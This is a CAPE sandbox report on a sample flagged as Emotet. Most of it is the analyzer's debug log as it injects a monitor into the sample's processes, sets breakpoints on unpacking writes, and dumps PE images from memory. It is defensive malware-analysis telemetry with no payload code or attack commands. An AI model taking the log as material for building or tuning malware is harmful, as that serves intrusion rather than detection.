CAPE

Detections: Emotet


Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2019-02-11 19:32:07 2019-02-11 19:35:57 230 seconds Show Options Show Log
route = internet
procdump = 1
2019-02-11 19:32:08,000 [root] INFO: Date set to: 02-11-19, time set to: 19:32:08, timeout set to: 200
2019-02-11 19:32:08,015 [root] DEBUG: Starting analyzer from: C:\eqetkxw
2019-02-11 19:32:08,015 [root] DEBUG: Storing results at: C:\qwuvvE
2019-02-11 19:32:08,015 [root] DEBUG: Pipe server name: \\.\PIPE\AGjwkpv
2019-02-11 19:32:08,015 [root] INFO: Analysis package "Extraction" has been specified.
2019-02-11 19:32:08,265 [root] DEBUG: Started auxiliary module Browser
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Curtain
2019-02-11 19:32:08,279 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module DigiSig
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Disguise
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Human
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Screenshots
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Sysmon
2019-02-11 19:32:08,279 [root] DEBUG: Started auxiliary module Usage
2019-02-11 19:32:08,279 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-02-11 19:32:08,279 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-02-11 19:32:08,451 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\sPVjc.exe" with arguments "" with pid 2932
2019-02-11 19:32:08,451 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:08,451 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:08,483 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2932
2019-02-11 19:32:10,496 [lib.api.process] INFO: Successfully resumed process with pid 2932
2019-02-11 19:32:10,496 [root] INFO: Added new process to list with pid: 2932
2019-02-11 19:32:10,573 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:10,573 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x130000
2019-02-11 19:32:10,573 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:10,667 [root] INFO: Monitor successfully loaded in process with pid 2932.
2019-02-11 19:32:10,683 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x140000, RegionSize: 0x1a000.
2019-02-11 19:32:10,683 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x140000, AllocationSize: 0x1a000, ThreadId: 0xb78
2019-02-11 19:32:10,683 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x140000 and Type=0x1.
2019-02-11 19:32:10,683 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x140000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,697 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x140000
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x140000.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x140000.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x14003c and Type=0x1.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x14003c (EIP = 0x12736e2)
2019-02-11 19:32:10,697 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x14003c.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1400c8 and Type=0x1.
2019-02-11 19:32:10,697 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x1400c8 (EIP = 0x12736e2)
2019-02-11 19:32:10,697 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:10,697 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1400c8.
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:10,697 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x1400c8.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x1400f0 and Type=0x1.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x14007f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x14007f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,713 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x1400f0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x141f7f and Type=0x0.
2019-02-11 19:32:10,713 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x141f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,713 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,730 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x141f7f
2019-02-11 19:32:10,730 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x141f7f.
2019-02-11 19:32:10,730 [root] DEBUG: DumpPEsInRange: Scanning range 0x140000 - 0x159000.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x140000-0x159000.
2019-02-11 19:32:10,730 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x270000, RegionSize: 0x10000.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x140000.
2019-02-11 19:32:10,730 [root] DEBUG: DumpPEsInRange: Scanning range 0x140000 - 0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,730 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x140000-0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x140000.
2019-02-11 19:32:10,730 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2932_73010122311122019
2019-02-11 19:32:10,730 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_73010122311122019
2019-02-11 19:32:10,730 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x140000 - 0x15a000.
2019-02-11 19:32:10,730 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x270000, AllocationSize: 0x10000, ThreadId: 0xb78
2019-02-11 19:32:10,730 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x270000 and Type=0x1.
2019-02-11 19:32:10,730 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x270000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,730 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x270000
2019-02-11 19:32:10,730 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x14177b
2019-02-11 19:32:10,730 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,730 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x270000: 0x0.
2019-02-11 19:32:10,730 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x270000 and Type=0x0.
2019-02-11 19:32:10,730 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,744 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x270000, AllocationBaseExecBpSet = 1 (EIP = 0x14177b)
2019-02-11 19:32:10,744 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: Address: 0x211000, RegionSize: 0xf744
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,744 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_74510122311122019
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x210000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x270000 - 0x280000.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x270000.
2019-02-11 19:32:10,744 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220000.
2019-02-11 19:32:10,744 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,744 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,760 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_76110122311122019
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,760 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x210000.
2019-02-11 19:32:10,760 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220000.
2019-02-11 19:32:10,760 [root] DEBUG: ProtectionHandler: Found and dumped PE image(s).
2019-02-11 19:32:10,760 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x211000 and Type=0x0.
2019-02-11 19:32:10,760 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x211000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:10,760 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x211000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:10,760 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x211000
2019-02-11 19:32:10,760 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x211000.
2019-02-11 19:32:10,760 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x210000, size 0x10744).
2019-02-11 19:32:10,760 [root] DEBUG: DumpPEsInRange: Scanning range 0x210000 - 0x220744.
2019-02-11 19:32:10,760 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x210000
2019-02-11 19:32:10,760 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x210000
2019-02-11 19:32:10,760 [root] DEBUG: DumpProcess: Module entry point VA is 0x21f5e0
2019-02-11 19:32:10,760 [root] DEBUG: savePeFileToDisk: Name clash, trying to obtain new name...
2019-02-11 19:32:10,776 [root] DEBUG: Error 183 (0xb7) - savePeFileToDisk: Failed twice to rename file: Cannot create a file when that file already exists.
2019-02-11 19:32:10,776 [root] DEBUG: Error 183 (0xb7) - DumpProcess: Error - Cannot dump image: Cannot create a file when that file already exists.
2019-02-11 19:32:10,776 [root] DEBUG: DumpImageInCurrentProcess: Failed to dump PE as virtual image.
2019-02-11 19:32:10,776 [root] DEBUG: DumpPEsInRange: Failed to dump PE image from 0x210000.
2019-02-11 19:32:10,776 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x210001-0x220744.
2019-02-11 19:32:10,776 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2932_77610122311122019
2019-02-11 19:32:10,776 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2932_77610122311122019
2019-02-11 19:32:10,776 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x211000 - 0x220744.
2019-02-11 19:32:10,776 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x211000.
2019-02-11 19:32:10,776 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x210000.
2019-02-11 19:32:10,776 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:10,808 [root] INFO: Announced 32-bit process name: sPVjc.exe pid: 2832
2019-02-11 19:32:10,808 [root] INFO: Added new process to list with pid: 2832
2019-02-11 19:32:10,808 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:32:10,808 [lib.api.process] INFO: 32-bit DLL to inject is C:\eqetkxw\dll\eoxfAQ.dll, loader C:\eqetkxw\bin\coeISff.exe
2019-02-11 19:32:10,808 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2832
2019-02-11 19:32:10,808 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:10,808 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x7716124a, Wow64PrepareForException: 0x0
2019-02-11 19:32:10,808 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1e0000
2019-02-11 19:32:10,808 [root] DEBUG: CAPE initialised (32-bit).
2019-02-11 19:32:10,808 [root] INFO: Disabling sleep skipping.
2019-02-11 19:32:10,822 [root] INFO: Monitor successfully loaded in process with pid 2832.
2019-02-11 19:32:10,822 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x270000, RegionSize: 0x1a000.
2019-02-11 19:32:10,822 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x270000, AllocationSize: 0x1a000, ThreadId: 0xb70
2019-02-11 19:32:10,822 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x270000 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x270000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,822 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x270000
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: M written to first byte, awaiting next byte.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x270000.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: MZ header found.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x27003c and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback: set write bp on e_lfanew write location: 0x27003c (EIP = 0x12736e2)
2019-02-11 19:32:10,822 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback entry.
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback: Breakpoint 0 at Address 0x27003c.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x2700c8 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback: set write bp on e_lfanew write location 0x2700c8 (EIP = 0x12736e2)
2019-02-11 19:32:10,822 [root] DEBUG: PEPointerWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x2700c8.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: PE header has: 0x50.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,822 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: Breakpoint 0 at Address 0x2700c8.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 0 within Context, Size=0x4, Address=0x2700f0 and Type=0x1.
2019-02-11 19:32:10,822 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,822 [root] DEBUG: PEHeaderWriteCallback: set write bp on AddressOfEntryPoint location (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: PEHeaderWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x27007f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Execution bp 1 set on EntryPoint 0x27007f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x12736e2
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Breakpoint 0 at Address 0x2700f0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x271f7f and Type=0x0.
2019-02-11 19:32:10,838 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback: Updated EntryPoint execution bp 1 to 0x271f7f (EIP = 0x12736e2).
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointWriteCallback executed successfully.
2019-02-11 19:32:10,838 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x271f7f
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointExecCallback: Breakpoint 1 at Address 0x271f7f.
2019-02-11 19:32:10,838 [root] DEBUG: DumpPEsInRange: Scanning range 0x270000 - 0x289000.
2019-02-11 19:32:10,838 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,838 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x270000-0x289000.
2019-02-11 19:32:10,838 [root] DEBUG: EntryPointExecCallback: failed to dump PE module.
2019-02-11 19:32:10,838 [root] DEBUG: NtAllocateVirtualMemory hook, BaseAddress:0x220000, RegionSize: 0x10000.
2019-02-11 19:32:10,838 [root] DEBUG: NtAllocateVirtualMemory hook: attempting CAPE dump on previous region: 0x270000.
2019-02-11 19:32:10,838 [root] DEBUG: DumpPEsInRange: Scanning range 0x270000 - 0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: Characteristics bad.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x270000-0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: NtAllocateVirtualMemory hook: dumping memory range at 0x270000.
2019-02-11 19:32:10,854 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\eqetkxw\CAPE\2832_85410122311122019
2019-02-11 19:32:10,854 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2832_85410122311122019
2019-02-11 19:32:10,854 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x270000 - 0x28a000.
2019-02-11 19:32:10,854 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x220000, AllocationSize: 0x10000, ThreadId: 0xb70
2019-02-11 19:32:10,854 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x220000 and Type=0x1.
2019-02-11 19:32:10,854 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x220000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:10,854 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x220000
2019-02-11 19:32:10,854 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x27177b
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x220000.
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x220000: 0x0.
2019-02-11 19:32:10,854 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x220000 and Type=0x0.
2019-02-11 19:32:10,854 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x220000, AllocationBaseExecBpSet = 1 (EIP = 0x27177b)
2019-02-11 19:32:10,854 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:10,854 [root] DEBUG: ProtectionHandler: Address: 0x291000, RegionSize: 0xf744
2019-02-11 19:32:10,854 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x220000.
2019-02-11 19:32:10,854 [root] DEBUG: DumpPEsInRange: Scanning range 0x290000 - 0x2a0000.
2019-02-11 19:32:10,854 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x290000
2019-02-11 19:32:10,854 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:10,854 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x290000
2019-02-11 19:32:10,854 [root] DEBUG: DumpProcess: Module entry point VA is 0x29f5e0
2019-02-11 19:32:10,869 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2832_87010122311122019
2019-02-11 19:32:10,869 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:10,869 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x290000.
2019-02-11 19:32:10,869 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x290001-0x2a0000.
2019-02-11 19:32:10,869 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
